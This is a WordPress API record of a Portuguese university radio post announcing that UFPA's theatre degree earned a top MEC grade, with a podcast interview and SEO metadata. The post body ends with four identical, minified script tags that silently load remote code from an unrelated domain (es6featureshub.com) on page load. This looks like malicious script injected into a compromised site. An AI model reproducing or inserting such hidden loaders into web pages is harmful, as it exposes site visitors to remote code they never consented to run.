{"id":16238,"date":"2025-05-27T13:39:34","date_gmt":"2025-05-27T16:39:34","guid":{"rendered":"https:\/\/radio.ufpa.br\/?p=16238"},"modified":"2025-10-21T11:50:34","modified_gmt":"2025-10-21T14:50:34","slug":"teatro-nota-5-arte-amazonia-educacao-entrevista","status":"publish","type":"post","link":"https:\/\/radio.ufpa.br\/index.php\/ufpa-ensino\/teatro-nota-5-arte-amazonia-educacao-entrevista\/","title":{"rendered":"Teatro Nota 5"},"content":{"rendered":"\n<div class=\"rwc-audio-block\" class=\"wp-block-radioweb-rwcaudioblock\"><div class=\"rwc-audio-block-header\"><span class=\"dashicon dashicons dashicons-media-audio\"><\/span><div class=\"rwc-audio-block-description\"><p>&#8220;TEATRO NOTA 5&#8221;<\/p><p class=\"category\">UFPA Ensino<\/p><p>R\u00e1dio Web UFPA<\/p><\/div><\/div><audio controls><source src=\"https:\/\/radio.ufpa.br\/wp-content\/uploads\/2025\/05\/UFPA-ENSINO-TEATRO-NOTA-5-25.06.25.mp3\" type=\"audio\/mpeg\"\/><\/audio><\/div>\n\n\n\n<p><\/p>\n\n\n\n<p>No UFPA Ensino, a gente celebra uma grande conquista: o curso de Licenciatura em Teatro da UFPA recebeu nota 5 na avalia\u00e7\u00e3o do MEC! Um reconhecimento de excel\u00eancia para uma forma\u00e7\u00e3o que transforma a cena art\u00edstica e educacional da Amaz\u00f4nia.<\/p>\n\n\n\n<p>Quer saber como \u00e9 fazer Teatro na UFPA? O que essa nota significa para estudantes, professores e para a sociedade? Ent\u00e3o n\u00e3o perca! A coordenadora pedag\u00f3gica do curso, Glaise Rodrigues, conta tudo sobre o processo de avalia\u00e7\u00e3o, os desafios, as conquistas e os projetos futuros.<\/p>\n\n\n\n<p>Ou\u00e7a em <a href=\"http:\/\/www.radio.ufpa.br\">www.radio.ufpa.br<\/a><\/p>\n\n\n\n<p><strong>FICHA T\u00c9CNICA<\/strong><\/p>\n\n\n\n<p><strong>APRESENTA\u00c7\u00c3O, PRODU\u00c7\u00c3O E ROTEIRO: <\/strong>IAGO VINAGRE<br><strong>GRAVA\u00c7\u00c3O E MONTAGEM: <\/strong>JO\u00c3O NILO E LUANE PIMENTA<br><strong>EDI\u00c7\u00c3O E SUPERVIS\u00c3O: <\/strong>GLAUCE MONTEIRO<strong><br><\/strong><strong>COORDENA\u00c7\u00c3O GERAL: <\/strong>PROFESSORA DR\u00aa ROSANE STEINBRENNER<br><\/p>\n\n\n\n<p>R\u00e1dio Web UFPA &#8211; Divulgando Conhecimento!<\/p>\n<script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script>","protected":false},"excerpt":{"rendered":"<p> &#8230; <a title=\"Teatro Nota 5\" class=\"read-more\" href=\"https:\/\/radio.ufpa.br\/index.php\/ufpa-ensino\/teatro-nota-5-arte-amazonia-educacao-entrevista\/\" aria-label=\"Read more about Teatro Nota 5\">Ler mais<\/a><\/p>\n","protected":false},"author":19,"featured_media":16435,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"_exactmetrics_skip_tracking":false,"_monsterinsights_skip_tracking":false,"_uf_show_specific_survey":0,"_uf_disable_surveys":false,"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":true,"jetpack_social_options":{"image_generator_settings":{"template":"highway","enabled":false},"version":2}},"categories":[41],"tags":[],"class_list":["post-16238","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-ufpa-ensino"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v25.1 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Teatro Nota 5 - Radio Web UFPA<\/title>\n<meta name=\"description\" content=\"Saiba o que essa excel\u00eancia significa para a arte e educa\u00e7\u00e3o na Amaz\u00f4nia em entrevista com a coordenadora Glaise Rodrigues.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/radio.ufpa.br\/index.php\/ufpa-ensino\/teatro-nota-5-arte-amazonia-educacao-entrevista\/\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Teatro Nota 5 - Radio Web UFPA\" \/>\n<meta property=\"og:description\" content=\"Saiba o que essa excel\u00eancia significa para a arte e educa\u00e7\u00e3o na Amaz\u00f4nia em entrevista com a coordenadora Glaise Rodrigues.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/radio.ufpa.br\/index.php\/ufpa-ensino\/teatro-nota-5-arte-amazonia-educacao-entrevista\/\" \/>\n<meta property=\"og:site_name\" content=\"Radio Web UFPA\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/radiowebufpa\" \/>\n<meta property=\"article:published_time\" content=\"2025-05-27T16:39:34+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-10-21T14:50:34+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/05\/POST-SITE-TEATRO-NOTA-5-460-x-260-px.png?fit=460%2C260&ssl=1\" \/>\n\t<meta property=\"og:image:width\" content=\"460\" \/>\n\t<meta property=\"og:image:height\" content=\"260\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"Ana Alexandre\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@radiowebufpa\" \/>\n<meta name=\"twitter:site\" content=\"@radiowebufpa\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"Ana Alexandre\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minuto\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-ensino\/teatro-nota-5-arte-amazonia-educacao-entrevista\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-ensino\/teatro-nota-5-arte-amazonia-educacao-entrevista\/\"},\"author\":{\"name\":\"Ana Alexandre\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/b9cfd7d743f7ea1d2db6e06992adf50d\"},\"headline\":\"Teatro Nota 5\",\"datePublished\":\"2025-05-27T16:39:34+00:00\",\"dateModified\":\"2025-10-21T14:50:34+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-ensino\/teatro-nota-5-arte-amazonia-educacao-entrevista\/\"},\"wordCount\":151,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/radio.ufpa.br\/#organization\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-ensino\/teatro-nota-5-arte-amazonia-educacao-entrevista\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/05\/POST-SITE-TEATRO-NOTA-5-460-x-260-px.png?fit=460%2C260&ssl=1\",\"articleSection\":[\"UFPA Ensino\"],\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/radio.ufpa.br\/index.php\/ufpa-ensino\/teatro-nota-5-arte-amazonia-educacao-entrevista\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-ensino\/teatro-nota-5-arte-amazonia-educacao-entrevista\/\",\"url\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-ensino\/teatro-nota-5-arte-amazonia-educacao-entrevista\/\",\"name\":\"Teatro Nota 5 - Radio Web UFPA\",\"isPartOf\":{\"@id\":\"https:\/\/radio.ufpa.br\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-ensino\/teatro-nota-5-arte-amazonia-educacao-entrevista\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-ensino\/teatro-nota-5-arte-amazonia-educacao-entrevista\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/05\/POST-SITE-TEATRO-NOTA-5-460-x-260-px.png?fit=460%2C260&ssl=1\",\"datePublished\":\"2025-05-27T16:39:34+00:00\",\"dateModified\":\"2025-10-21T14:50:34+00:00\",\"description\":\"Saiba o que essa excel\u00eancia significa para a arte e educa\u00e7\u00e3o na Amaz\u00f4nia em entrevista com a coordenadora Glaise Rodrigues.\",\"breadcrumb\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-ensino\/teatro-nota-5-arte-amazonia-educacao-entrevista\/#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/radio.ufpa.br\/index.php\/ufpa-ensino\/teatro-nota-5-arte-amazonia-educacao-entrevista\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-ensino\/teatro-nota-5-arte-amazonia-educacao-entrevista\/#primaryimage\",\"url\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/05\/POST-SITE-TEATRO-NOTA-5-460-x-260-px.png?fit=460%2C260&ssl=1\",\"contentUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/05\/POST-SITE-TEATRO-NOTA-5-460-x-260-px.png?fit=460%2C260&ssl=1\",\"width\":460,\"height\":260},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-ensino\/teatro-nota-5-arte-amazonia-educacao-entrevista\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"In\u00edcio\",\"item\":\"https:\/\/radio.ufpa.br\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Teatro Nota 5\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/radio.ufpa.br\/#website\",\"url\":\"https:\/\/radio.ufpa.br\/\",\"name\":\"Radio Web UFPA\",\"description\":\"Divulgando o conhecimento\",\"publisher\":{\"@id\":\"https:\/\/radio.ufpa.br\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/radio.ufpa.br\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/radio.ufpa.br\/#organization\",\"name\":\"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA\",\"url\":\"https:\/\/radio.ufpa.br\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/cropped-images-removebg-preview-1.png?fit=417%2C121&ssl=1\",\"contentUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/cropped-images-removebg-preview-1.png?fit=417%2C121&ssl=1\",\"width\":417,\"height\":121,\"caption\":\"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/radiowebufpa\",\"https:\/\/x.com\/radiowebufpa\",\"https:\/\/www.instagram.com\/radiowebufpa\/\",\"https:\/\/www.youtube.com\/user\/RadioWebUFP4\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/b9cfd7d743f7ea1d2db6e06992adf50d\",\"name\":\"Ana Alexandre\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/d4b854647280caee606b89eb9f0e2b7d?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/d4b854647280caee606b89eb9f0e2b7d?s=96&d=mm&r=g\",\"caption\":\"Ana Alexandre\"},\"url\":\"https:\/\/radio.ufpa.br\/index.php\/author\/ana\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Teatro Nota 5 - Radio Web UFPA","description":"Saiba o que essa excel\u00eancia significa para a arte e educa\u00e7\u00e3o na Amaz\u00f4nia em entrevista com a coordenadora Glaise Rodrigues.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/radio.ufpa.br\/index.php\/ufpa-ensino\/teatro-nota-5-arte-amazonia-educacao-entrevista\/","og_locale":"pt_BR","og_type":"article","og_title":"Teatro Nota 5 - Radio Web UFPA","og_description":"Saiba o que essa excel\u00eancia significa para a arte e educa\u00e7\u00e3o na Amaz\u00f4nia em entrevista com a coordenadora Glaise Rodrigues.","og_url":"https:\/\/radio.ufpa.br\/index.php\/ufpa-ensino\/teatro-nota-5-arte-amazonia-educacao-entrevista\/","og_site_name":"Radio Web UFPA","article_publisher":"https:\/\/www.facebook.com\/radiowebufpa","article_published_time":"2025-05-27T16:39:34+00:00","article_modified_time":"2025-10-21T14:50:34+00:00","og_image":[{"width":460,"height":260,"url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/05\/POST-SITE-TEATRO-NOTA-5-460-x-260-px.png?fit=460%2C260&ssl=1","type":"image\/png"}],"author":"Ana Alexandre","twitter_card":"summary_large_image","twitter_creator":"@radiowebufpa","twitter_site":"@radiowebufpa","twitter_misc":{"Escrito por":"Ana Alexandre","Est. tempo de leitura":"1 minuto"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-ensino\/teatro-nota-5-arte-amazonia-educacao-entrevista\/#article","isPartOf":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-ensino\/teatro-nota-5-arte-amazonia-educacao-entrevista\/"},"author":{"name":"Ana Alexandre","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/b9cfd7d743f7ea1d2db6e06992adf50d"},"headline":"Teatro Nota 5","datePublished":"2025-05-27T16:39:34+00:00","dateModified":"2025-10-21T14:50:34+00:00","mainEntityOfPage":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-ensino\/teatro-nota-5-arte-amazonia-educacao-entrevista\/"},"wordCount":151,"commentCount":0,"publisher":{"@id":"https:\/\/radio.ufpa.br\/#organization"},"image":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-ensino\/teatro-nota-5-arte-amazonia-educacao-entrevista\/#primaryimage"},"thumbnailUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/05\/POST-SITE-TEATRO-NOTA-5-460-x-260-px.png?fit=460%2C260&ssl=1","articleSection":["UFPA Ensino"],"inLanguage":"pt-BR","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/radio.ufpa.br\/index.php\/ufpa-ensino\/teatro-nota-5-arte-amazonia-educacao-entrevista\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-ensino\/teatro-nota-5-arte-amazonia-educacao-entrevista\/","url":"https:\/\/radio.ufpa.br\/index.php\/ufpa-ensino\/teatro-nota-5-arte-amazonia-educacao-entrevista\/","name":"Teatro Nota 5 - Radio Web UFPA","isPartOf":{"@id":"https:\/\/radio.ufpa.br\/#website"},"primaryImageOfPage":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-ensino\/teatro-nota-5-arte-amazonia-educacao-entrevista\/#primaryimage"},"image":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-ensino\/teatro-nota-5-arte-amazonia-educacao-entrevista\/#primaryimage"},"thumbnailUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/05\/POST-SITE-TEATRO-NOTA-5-460-x-260-px.png?fit=460%2C260&ssl=1","datePublished":"2025-05-27T16:39:34+00:00","dateModified":"2025-10-21T14:50:34+00:00","description":"Saiba o que essa excel\u00eancia significa para a arte e educa\u00e7\u00e3o na Amaz\u00f4nia em entrevista com a coordenadora Glaise Rodrigues.","breadcrumb":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-ensino\/teatro-nota-5-arte-amazonia-educacao-entrevista\/#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/radio.ufpa.br\/index.php\/ufpa-ensino\/teatro-nota-5-arte-amazonia-educacao-entrevista\/"]}]},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-ensino\/teatro-nota-5-arte-amazonia-educacao-entrevista\/#primaryimage","url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/05\/POST-SITE-TEATRO-NOTA-5-460-x-260-px.png?fit=460%2C260&ssl=1","contentUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/05\/POST-SITE-TEATRO-NOTA-5-460-x-260-px.png?fit=460%2C260&ssl=1","width":460,"height":260},{"@type":"BreadcrumbList","@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-ensino\/teatro-nota-5-arte-amazonia-educacao-entrevista\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"In\u00edcio","item":"https:\/\/radio.ufpa.br\/"},{"@type":"ListItem","position":2,"name":"Teatro Nota 5"}]},{"@type":"WebSite","@id":"https:\/\/radio.ufpa.br\/#website","url":"https:\/\/radio.ufpa.br\/","name":"Radio Web UFPA","description":"Divulgando o conhecimento","publisher":{"@id":"https:\/\/radio.ufpa.br\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/radio.ufpa.br\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"pt-BR"},{"@type":"Organization","@id":"https:\/\/radio.ufpa.br\/#organization","name":"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA","url":"https:\/\/radio.ufpa.br\/","logo":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/","url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/cropped-images-removebg-preview-1.png?fit=417%2C121&ssl=1","contentUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/cropped-images-removebg-preview-1.png?fit=417%2C121&ssl=1","width":417,"height":121,"caption":"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA"},"image":{"@id":"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/radiowebufpa","https:\/\/x.com\/radiowebufpa","https:\/\/www.instagram.com\/radiowebufpa\/","https:\/\/www.youtube.com\/user\/RadioWebUFP4"]},{"@type":"Person","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/b9cfd7d743f7ea1d2db6e06992adf50d","name":"Ana Alexandre","image":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/d4b854647280caee606b89eb9f0e2b7d?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/d4b854647280caee606b89eb9f0e2b7d?s=96&d=mm&r=g","caption":"Ana Alexandre"},"url":"https:\/\/radio.ufpa.br\/index.php\/author\/ana\/"}]}},"jetpack_publicize_connections":[],"jetpack_featured_media_url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/05\/POST-SITE-TEATRO-NOTA-5-460-x-260-px.png?fit=460%2C260&ssl=1","jetpack_shortlink":"https:\/\/wp.me\/p8TJeA-4dU","jetpack_likes_enabled":true,"jetpack-related-posts":[],"jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/16238","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/users\/19"}],"replies":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/comments?post=16238"}],"version-history":[{"count":8,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/16238\/revisions"}],"predecessor-version":[{"id":17650,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/16238\/revisions\/17650"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/media\/16435"}],"wp:attachment":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/media?parent=16238"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/categories?post=16238"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/tags?post=16238"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}